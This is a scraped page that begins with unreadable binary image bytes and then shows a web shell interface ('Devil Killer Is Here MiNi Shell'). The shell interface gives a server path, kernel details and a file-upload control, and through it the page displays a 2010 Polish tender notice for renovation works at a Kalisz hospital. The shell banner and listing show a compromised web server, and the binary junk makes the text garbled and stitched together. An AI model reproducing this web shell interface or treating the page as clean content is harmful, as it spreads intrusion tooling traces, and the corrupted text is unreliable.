JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100906/279712-N-2010.html

<p class="kh_header"><b>Kalisz: roboty budowlane w budynku Wojewódzkiego Szpitala Zespolonego im. Ludwika Perzyny w Kaliszu przy ul. Poznańskiej i ul. Toruńskiej z podziałem na 4 zadania</b><br>
<b>Numer ogłoszenia: 279712 - 2010; data zamieszczenia: 06.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu , ul. Poznańska 79, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7651397, faks 062 7571323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalkalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> roboty budowlane w budynku Wojewódzkiego Szpitala Zespolonego im. Ludwika Perzyny w Kaliszu przy ul. Poznańskiej i ul. Toruńskiej z podziałem na 4 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1: Modernizacja pomieszczeń na kondygnacji 7D Wojewódzkiego Szpitala Zespolonego im. Ludwika Perzyny w Kaliszu na potrzeby przenoszonego Oddziału Gastroenterologii Dziecięcej

Prace obejmują wykonanie robót modernizacyjnych dla potrzeb Oddziału Gastroenterologii Dziecięcej mieszczącej się w segmencie D kondygnacja 7 budynku głównego Wojewódzkiego Szpitala Zespolonego im. L. Perzyny w Kaliszu przy ul. Poznańskiej 79.
Szczegółowy zakres robót wynika z opracowanego przedmiaru robót, dokumentacji technicznej oraz Specyfikacji Technicznej Wykonania i Odbioru Robót budowlanych - stanowiących załącznik do niniejszego wniosku.
Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.
Roboty modernizacyjne przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: do  7 grudnia 2010 roku.
Dopuszcza się płatność faktur częściowych, po potwierdzeniu przez inspektora nadzoru wykonania zakresu robót objętych płatnością według procentowego zaawansowania robót.
Warunki gwarancji : na wykonane roboty 36  miesięcy.
Szczegółowy zakres robót został zawarty w następujących załącznikach do Specyfikacji Istotnych Warunków Zamówieni, stanowiących integralną jej część: 

Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych 
Przedmiarze Robót 
Opis techniczny i rysunki. 



Zadanie Nr 2: Modernizacja segmentu 9D dla potrzeb Oddziału Neurologii Wojewódzkiego 
Szpitala Zespolonego im. Ludwika Perzyny w Kaliszu

ROBOTY OBJĘTE PROGRAMEM DOSTOSOWAWCZYM
         1. Sale chorych:
a.wymiana stolarki drzwiowej
b.wymiana grzejników
c.wymiana wykładzin podłogowych
d.wymiana kratek wentylacyjnych na kratki aluminiowe z przepustnicą
e.wymiana desek odbojowych na ścianach i sklejki nad drzwiami
roboty malarskie

2. Łazienki przy salach chorych
a.montaż pochwytów

3.Łazienka personelu - pom. nr 24
a.wymiana płytek sciennych i podłogowych
b.wymiana grzejników
c.roboty malarskie
d.wymiana stolarki drzwiowej

4.Korytarz - pom. nr 28
a.wymiana wejściowych ścianek działowych

5.Łazienka dla pacjentów -przystosowanie dla potrzeb osób niepełnosprawnych
a.wymiana płytek ściennych i podłogowych
b.wymiana grzejników
c.roboty malarskie
d.wymiana stolarki drzwiowej
e.wymiana lamp oświetleniowych oraz osprzętu elektrycznego
f.wymiana instalacji wod. - kan. z urządzeniami
g.montaż wentylatorka mechanicznego
h.wymiana sufitów podwieszanych

6.Brudownik - pom. nr 23
a.wymiana płytek ściennych i poidłogowych na wykładziny
b.wymiana grzejników
c.roboty malarskie
d.wymiana stolarki drzwiowej
e.wymiana lamp oświetleniowych oraz osprzętu elektrycznego
f.wymiana instalacji wod. kan z urządzeniami

7.Pokoje badań i gabinet zabiegowy - pom. nr 17-19
a.wymiana grzejników
b.okładziny ścian
c.wymiana stolarki drzwiowej
d.wykonanie posadzek
e.roboty malarskie

8.Pozostałe pomieszczenia - pom. nr 1-2, 15-16, 20-21, 26, 27a
a.wymiana grzejników
b.wymiana stolarki drzwiowej
c.wymiana wykładzin podłogowych
d.roboty malarskie

ROBOTY NIE OBJĘTE PROGRAMEM DOSTOSOWAWCZYM

1.Sale chorych wraz z korytarzykami
a.wymiana podejść kanalizacyjnych oraz armatury sanitarnej (umywalek i baterii)
b.wymiana fartuszków z płytek przy umywalkach
c.wymiana sufitów podwieszanych w korytarzykach
d.malowanie łóżek i stolików przyłóżkowych
e.wymiana osprzętu elektrycznego

2.Łazienki przy salach chorych
a.wymiana instalacji wod.-kan. z urządzeniami
b.wymiana lamp oświetleniowych oraz osprzętu elektrycznego
montaż wentylatorka mechanicznego
c.wymiana sufitów podwieszanych w korytarzykach
d.wymiana płytek ściennych i podłogowych

3.Korytarz
a.wymiana instalacji oświetlenia ciągu komunikacyjnego i lamp przyzywowych
b.wymiana sufitu podwieszanego i desek odbojowych na ścianach, a także obłożenie elementów c. drewnopochodnych
d. wymiana drzwi szachtów instalacyjnych
roboty malarskie 

4.Pokoje badań i gabinet zabiegowy - pom. nr 17-19
a.roboty branży elektrycznej
b.roboty branży sanitarnej

5.Pozostałe pomieszczenia
a.roboty branży budowlanej
b.roboty branży elektrycznej
c.roboty branży sanitarnej

Roboty remontowe przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: 7 grudnia 2010 r.
Roboty budowlane będą wykonywane na omawianym oddziale w dwóch etapach: 
I etap: remont na wyłączonej z ruchu części oddziału
II etap: po zakończeniu pierwszego etapu i przeniesieniu pacjentów na wyremontowany odcinek, wykonanie remontu na wyłączonej z ruchu pozostałej części oddziału.
Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.

Dopuszcza się płatność faktur częściowych, po potwierdzeniu przez inspektora nadzoru wykonania zakresu robót objętych płatnością według procentowego zaawansowania robót.
Warunki gwarancji i/lub rękojmi na wykonane roboty 24  miesięcy.

Szczegółowy zakres robót został zawarty w następujących załącznikach do Specyfikacji Istotnych Warunków Zamówieni, stanowiących integralną jej część: 

Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych 
Przedmiarze Robót 
Opis techniczny i rysunki. 

Zadanie Nr 3: Wykonanie szybu windowego i montaż windy w Budynku Zakaźnym Szpitala - realizacja 
programu dostosowawczego w obiektach przy ul. Toruńskiej

Roboty Oddziale Chorób Zakaźnych dla Dorosłych i Dzieci polegają na.:
a.robotach budowlanych związanych z wykonaniem szybu windowego oraz pomieszczeń przyległych wraz z klatką schodową,
b.wykonaniu instalacji elektrycznych (zasilanie i sterowanie dźwigu, instalacja oświetleniowa i instalacja zasilania gniazd wtykowych, oprzewodowanie pod instalację ppoż. oraz instalacja oddymiania w obrębie klatki schodowej,
c.dostawa i montaż dźwigu hydraulicznego dostosowanego do łączności ze służbami ratunkowymi opartej na sieci GSM.
Roboty remontowe przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: 7 grudnia 2010 r.
Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.
Warunki gwarancji - wykonawca udzieli 36 miesięcznej gwarancji na wykonane roboty.
 Warunki serwisu gwarancyjnego i pogwarancyjnego:
Wykonawca zapewni bezpłatna comiesięczną konserwację i usuwanie awarii w okresie gwarancji z uwzględnieniem bezpłatnego dojazdu. Czas reakcji po zgłoszeniu awarii 
nie może być dłuższy od 0,5 godziny.
 

Szczegółowy zakres robót został zawarty w następujących załącznikach do Specyfikacji Istotnych Warunków Zamówieni, stanowiących integralną jej część: 

Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych 
Przedmiarze Robót 
Opis techniczny i rysunki. 

Zadanie Nr 4: Roboty remontowe na Oddziale Urologii(seg. 8B) i Oddziale Chorób Dziecięcych (seg. 8D)


Roboty ogólnobudowlane w branży budowlanej i elektrycznej na Oddziale Urologii (seg. 8B) 
i Oddziale Chorób Dziecięcych (segm. 8D) w budynku Wojewódzkiego Szpitala Zespolonego im. L. Perzyny w Kaliszu przy ul. Poznańskiej 79.

Zakres robót obejmuje:
Oddział Urologii (kond. 8B):
1.	Demontaż listwowego sufitu podwieszanego
2.	Wykonanie konstrukcji rusztów pod sufity podwieszane modułowe
3.	Montaż modułów stropu podwieszonego f-my Armstrong lub równoważnych
4.	Wywiezienie elementów rozebranego sufitu wraz z kosztami składowania
5.	Obłożenie elementów drewnopochodnych (płyt) przy drzwiach wejściowych z korytarza płytami z ACROVIN gr. 2 mm
6.	Wymiana stolarki drewnianej na drzwi aluminiowe jednoskrzydłowe o szer. skrzydła 80 cm z szybka do zbicia w razie pożaru
7.	Wymiana drzwiczek rewizyjnych drewnianych i innych na gotowe malowane proszkowo
8.	Wymiana instalacji oświetlenia ciągu komunikacyjnego i lampek przyzywowych
a.demontaż opraw oświetleniowych świetlówkowych
b.demontaż opraw oswietleniowych żarowych oświetlenie awaryjne i nocne
c.demontaż sygnalizatora optycznego wewnętrznego
d.wymiana przewodów i puszek
e.montaż opraw oświetleniowych świetlówkowych w sufitach podwieszanych
f.montaż opraw oświetleniowych żarowych, halogenowych w sufitach podwieszanych (oświetlenie awaryjne i nocne)
g.przygotowanie podłoża pod osprzęt instalacyjny
h.montaż puszek instalacyjnych i do osprzętu
i.montaż sygnalizatora optycznego wewnętrznego
j.dokonanie przełączeń w puszkach systemu przywoławczego
k.sprawdzenie i uruchomienie linii sygnalizacji przyzywowych
l.sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia.

Oddział Chorób Dziecięcych (kond. 8 D)

1.	Demontaż listwowego sufitu podwieszanego
2.	Wykonanie konstrukcji rusztów pod sufity podwieszane modułowe
3.	Montaż modułów stropu podwieszonego f-my Armstrong lub równoważnych
4.	Wywiezienie elementów rozebranego sufitu wraz z kosztami składowania
5.	Obłożenie elementów drewnopochodnych (płyt) przy drzwiach wejściowych z korytarza płytami z ACROVIN gr. 2 mm
6.	Wymiana stolarki drewnianej na drzwi aluminiowe jednoskrzydłowe o szer. skrzydła 80 cm z szybka do zbicia w razie pożaru
7.	Wymiana drzwiczek rewizyjnych drewnianych i innych na gotowe malowane proszkowo
8.	Wymiana instalacji oświetlenia ciągu komunikacyjnego i lampek przyzywowych
a.demontaż opraw oświetleniowych świetlówkowych
b.demontaż opraw oswietleniowych żarowych oświetlenie awaryjne i nocne
c.demontaż sygnalizatora optycznego wewnętrznego
d.wymiana przewodów i puszek
e.montaż opraw oświetleniowych świetlówkowych w sufitach podwieszanych
f.montaż opraw oświetleniowych żarowych, halogenowych w sufitach podwieszanych (oświetlenie awaryjne i nocne)
g.przygotowanie podłoża pod osprzęt instalacyjny
h.montaż puszek instalacyjnych i do osprzętu
i.montaż sygnalizatora optycznego wewnętrznego
j.dokonanie przełączeń w puszkach systemu przywoławczego
k.sprawdzenie i uruchomienie linii sygnalizacji przyzywowych
l.sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia.

Roboty remontowe przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: 30 października 2010 r.

Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.

Warunki gwarancji : na wykonane roboty 24  miesięcy.

Szczegółowy zakres robót został zawarty w Przedmiarze Robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości określonej poniżej dla 
       poszczególnych zadań:
        Zadanie nr 1:      13 250,00 PLN                                             
        Zadanie nr 2:      9 000,00 PLN                                             
        Zadanie nr 3:      9 000,00 PLN. 
        Zadanie nr 4:      4 300,00 PLN 
           
       Wadium należy wnieść przed upływem terminu składania ofert określonym w punkcie I niniejszej SIWZ -  
       dotyczy również wadium składanego w formie pieniężnej. 

 2.   Formę wniesienia wadium wybiera Wykonawca spośród przewidzianych w art. 45, ust. 6 ustawy Pzp.
       Wadium wnoszone w formie pieniężnej należy wnieść przelewem na konto:
       Kredyt Bank S.A. O-Kalisz 90 1500 1432 1214 3004 7163 0000 z dopiskiem Wadium w przetargu na 
       adaptację i modernizację - Zadanie nr ........ 

Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku 
Zamawiającego.

W przypadku wnoszenia wadium w innych formach niż pieniężna oryginał dowodu ich wniesienia należy 
załączyć do oferty w osobnej koszulce lub zdeponować w kasie Zamawiającego w godz. 700 - 1430. 

Kserokopie dowodu wniesienia wadium, np. dowód przelania pieniędzy na konto Zamawiającego czy 
gwarancję bankową należy wpiąć trwale do oferty.

W przypadku wnoszenia wadium w formie gwarancji lub poręczenia przez wykonawców wspólnie 
ubiegających się o udzielenie zamówienia konieczne jest wymienienie w ich treści wszystkich 
wykonawców w sytuacji, gdy składają oni jeden wspólny dokument.

3.  Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej 
     lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako 
     najkorzystniejsza, z zastrzeżeniem pkt. 7.
4. Zamawiający zwróci wadium Wykonawcy, którego oferta została wybrana jako najkorzystniejsza 
    niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia 
    należytego wykonania umowy, jeżeli jego wniesienie żądano.

5.  Zamawiający zwróci niezwłocznie wadium , na wniosek wykonawcy, który wycofa ofertę przed upływem 
    terminu składania ofert.

6. Jeżeli Wykonawca wniesie wadium w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z 
    umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia 
    rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
    Wykonawcę. 

7.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o 
      którym mowa w art. 26, ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25, 
      ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego 
      stronie. 

8.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
    a)   odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
    b)   nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
    c)   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po 
   stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawca wykonał co najmniej jedno zamówienie na roboty budowlane o wartości minimum odpowiednio: Zadanie nr 1 - 300 000 PLN (brutto), Zadanie nr 2 - 300 000 PLN (brutto),  Zadanie nr 3 - 150 000 PLN (brutto): robota budowlana polegająca na montażu dźwigu  osobowego wraz z niezbędnymi do tego robotami budowlanymi oraz Zadanie nr 4 - 300 000 PLN (brutto).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu
Adres: ul. Poznańska 79, 62-800 Kalisz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2010 godzina 09:00, miejsce: Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu
Adres: ul. Poznańska 79, 62-800 Kalisz, bezwzględnie kancelaria zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja pomieszczeń na kondygnacji 7D Wojewódzkiego Szpitala Zespolonego im. Ludwika Perzyny w Kaliszu na potrzeby przenoszonego Oddziału Gastroenterologii Dziecięcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace obejmują wykonanie robót modernizacyjnych dla potrzeb Oddziału Gastroenterologii Dziecięcej mieszczącej się w segmencie D kondygnacja 7 budynku głównego Wojewódzkiego Szpitala Zespolonego im. L. Perzyny w Kaliszu przy ul. Poznańskiej 79.
